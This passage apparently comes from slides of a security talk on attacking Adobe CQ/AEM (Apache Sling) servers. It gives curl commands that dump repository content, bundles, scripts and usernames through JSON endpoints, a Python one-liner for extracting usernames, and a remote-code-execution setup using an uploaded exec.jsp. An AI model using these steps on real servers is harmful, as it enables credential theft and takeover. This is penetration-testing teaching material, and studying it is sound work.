4. • Sensitive information from JCR
• Installed OSGI bundles
• Custom scripts
• Usernames
• Password hashes
• Elements that allow anonymous modification
What do we want
5. • Use JsonRendererServlet
Sensitive information from JCR
curl -X “GET” http://127.0.0.1:8080/.json
curl -X “GET” http://127.0.0.1:8080/.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.infinity.json
6. • List of all bundles
• QueryBuilder is your friend!
http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
Installed OSGI bundles
curl -X “GET” http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json
7. • List customs scripts
• List compiled custom scripts from cache
Custom scripts
curl -X “GET” http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/var/classes.tidy.infinity.json
8. • Dump content node properties
• Use regular expression to extract usernames (pipe with prev command)
Usernames
curl -X “GET” http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print "n".join([m.group(1) for m in
re.finditer("".+?By":"(.+?)"",sys.stdin.readlines()[0])])' |
sort –u
16. • We have node – http://127.0.0.1:8080/rce
• We have script exec.jsp that is magically loaded into node –
http://127.0.0.1:8080/apps/rcetype
• When someone navigates to http://127.0.0.1:8080/rce.exec our
exec.jsp will be executed.
Remote code execution
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}